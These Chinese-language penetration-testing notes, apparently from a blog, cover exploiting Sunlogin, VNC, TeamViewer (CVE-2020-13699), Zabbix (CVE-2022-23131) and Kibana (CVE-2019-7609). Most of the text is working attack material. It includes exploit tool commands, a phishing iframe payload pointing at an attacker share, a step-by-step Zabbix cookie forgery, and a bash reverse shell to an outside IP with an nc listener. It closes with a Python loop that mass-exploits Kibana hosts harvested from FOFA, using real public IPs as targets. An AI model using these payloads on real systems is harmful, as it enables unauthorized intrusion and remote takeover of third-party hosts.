#知识点:
1、远程控制-第三方应用安全
2、三方应用-向日葵&VNC&TV
3、设备平台-Zabbix&Kibana漏洞
#章节内容:
常见服务应用的安全测试:
1、配置不当-未授权访问
2、安全机制-特定安全漏洞
3、安全机制-弱口令爆破攻击
#前置知识:
应用服务安全测试流程:见图
1、判断服务开放情况-端口扫描&组合应用等
2、判断服务类型归属-数据库&文件传输&通讯等
3、判断服务利用方式-特定漏洞&未授权&弱口令等
一、远程控制-向日葵&Vnc&Teamviewer
常用远程控制软件“向日葵”、teamviewer、vnc,这些软件也可能有漏洞
1、向日葵(用于控制远程服务器)
向日葵REC漏洞
利用工具xrkRce.exe
项目地址:https://github.com/Mr-xn/sunlogin_rce
使用:
xrkRce.exe -h 192.168.233.140 #探针向日葵占用的端口,这个过程大概10分钟
xrkRce.exe -h 192.168.233.140 -p 50354 -t rce -c "ipconfig" #使用端口,使用rce命令 -c:执行命令
xrkRce.exe -h 192.168.233.140 -p 50354 -t rce -c "反弹命令" # 执行反弹命令
2、VNC
探针到端口5900开放,可能目标服务器安装了VNC
VNC在使用的过程中有两个问题:
在security中有设置选项,这个就是设置安全的。如果设置为none,则就不需要密码就可以直接连接这个主机
安全中有几种模式:Windows password(Windows的密码),VNC password(设置的VNC密码),None(不需要密码验证)
如果设置为None,用客户端去连接这台主机,并不用输入账号密码,就可以直接连接
可在fofa中搜:app="VNC"&port="5900",查看使用VNC的资产
VNC密码是可以猜解的,使用hydra来进行vnc的密码爆破(不用输入账号)
3、Teamviewer
Teamviewer相关漏洞:cve-2020-13699
这个类似于网站钓鱼,攻击者构造特定的访问地址,需要管理员访问特定的地址
构造html代码:
<!DOCTYPE html>
<html>
<head>
<title>cve-2020-13699</title>
</head>
<body>
<p>Welcome to xiaodi!</p>
<iframe style="height:1px;width:1px;" src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>
</body>
</html>
teamviewer10: --play \\attacker-IP\share\fake.tvs是执行命令(可修改)
当管理员去访问:http://192.168.233.1:8081/web/test.html
这个时候就会自动执行命令
二、设备平台-Zabbix-CVE-2022-23131
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。
为了更好的维护服务器,在蓝队的使用的比较多。
默认端口:10051
Zabbix CVE-2022-23131 前端身份验证绕过漏洞
https://github.com/L0ading-x/cve-2022-23131
影响版本:
· 4.0.36
· 5.0.18
· 5.4.8
· 6.0.0alpha1
网上搜索目标资产:app="ZABBIX-监控系统"
参考:https://www.cnblogs.com/backlion/p/15958470.html zabbix登录绕过漏洞
1、漏洞复现
①目标地址:20.188.197.129
打开网站,点击检查元素,在点击(SAML),查看请求包:
② 找到数据包中的cookie
20.188.197.129/
zbx_session=eyJzZXNzaW9uaWQiOiJjMzYzNThhZDQ4ZjM3ODRmMjg2ZWI1N2E2N2QyZjMwMSIsInNpZ24iOiJDcnFaXC92dUpkOHg2bjB2cWI2R1BTZElkdG93RGtoNnNmOE9cL2ZiVXI2SXkxcjZlXC92MWM2Z0wwbW1Gb2xaN3NWenA4RGUwWUt1NWJQWFwvT05waHRuWEE9PSJ9
③ 对cookie的值进行base64解码:
{"sessionid":"c36358ad48f3784f286eb57a67d2f301","sign":"CrqZ\/vuJd8x6n0vqb6GPSdIdtowDkh6sf8O\/fbUr6Iy1r6e\/v1c6gL0mmFolZ7sVzp8De0YKu5bPX\/ONphtnXA=="}
③ 对解密后的值加上:{"saml_data":{"username_attribute":"Admin"}
{"saml_data":{"username_attribute":"Admin"},"sessionid":"c36358ad48f3784f286eb57a67d2f301","sign":"CrqZ\/vuJd8x6n0vqb6GPSdIdtowDkh6sf8O\/fbUr6Iy1r6e\/v1c6gL0mmFolZ7sVzp8De0YKu5bPX\/ONphtnXA=="}
④ 然后再进行base64编码,放到cookie里就可以实现了:eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSx7InNlc3Npb25pZCI6ImMzNjM1OGFkNDhmMzc4NGYyODZlYjU3YTY3ZDJmMzAxIiwic2lnbiI6IkNycVpcL3Z1SmQ4eDZuMHZxYjZHUFNkSWR0b3dEa2g2c2Y4T1wvZmJVcjZJeTFyNmVcL3YxYzZnTDBtbUZvbFo3c1Z6cDhEZTBZS3U1YlBYXC9PTnBodG5YQT09In0=
⑤ 修改原来的cookie值
修改完成后,点击(SAML)就能进行登录了。
2、利用工具复现
也可以直接用工具,直接获取cookie-解码-编码后的cookie信息,下载地址:
https://github.com/Mr-xn/cve-2022-23131
https://github.com/jweny/zabbix-saml-bypass-expG:\python38\python.exe cve-2022-23131.py http://xxxx Admin
3、登录后的后续利用:
① 在功能点中 administrator -> script,点击create script(创建一个脚本)
②本地监听
nc lvvp 5566
写一个反弹命令的脚本bash -i >& /dev/tcp/175.178.151.29/5566 0>&1
③ 创建脚本(脚本名称、反弹命令)
④ 运行脚本:在Monitoring中有一个Maps,选中他监控的主机,然后选中刚刚添加的脚本
⑤ 控制对方主机
4、其他漏洞
① CVE-2017-2824
② CVE-2020-11800
这两个漏洞利用条件比较苛刻,需要登录进行设置一些东西才能利用,没有意义。
三、设备平台-Kibana-CVE-2019-7609
Kibana为Elassticsearch设计的一款开源的视图工具,其5.6.15和6.6.1之前的版本中存在一处原型链污染漏洞,利用漏洞可以在目标服务器上执行任意代码。
默认端口:5601
fofa:port="5601"
参考:https://blog.csdn.net/zy15667076526/article/details/109706962
可以直接利用到工具:https://github.com/LandGrey/CVE-2019-7609
在虚拟机中运行:
命令:python2 CVE-2019-7609-kibana-rce.py -u http://45.233.129.129:5601 -host 175.178.151.29 -port 5566 --shell
# http://45.233.129.129:5601 目标地址
#175.178.151.29 -port 5566 本地监控地址
本地监控:
nc -lvvp 5566
因为版本不符合,没有探查到漏洞,利用fofa来进行导出数据,然后写python脚本来进行批量测试,
将所有的地址保存到ip.txt,用python脚本处理
import os
for ip in open('ips.txt'):
ip = ip.strip()
#print(ip)
cmdline = 'D:\python27\python.exe CVE-2019-7609-kibana-rce.py -u %s -host 175.178.151.29 -port 5566 --shell'%ip
print(cmdline)
os.system(cmdline)
然后再用python3去运行这个脚本,就可以完成测试
如果出现[+]就成功找到漏洞
操作对方主机:
浙公网安备 33010602011771号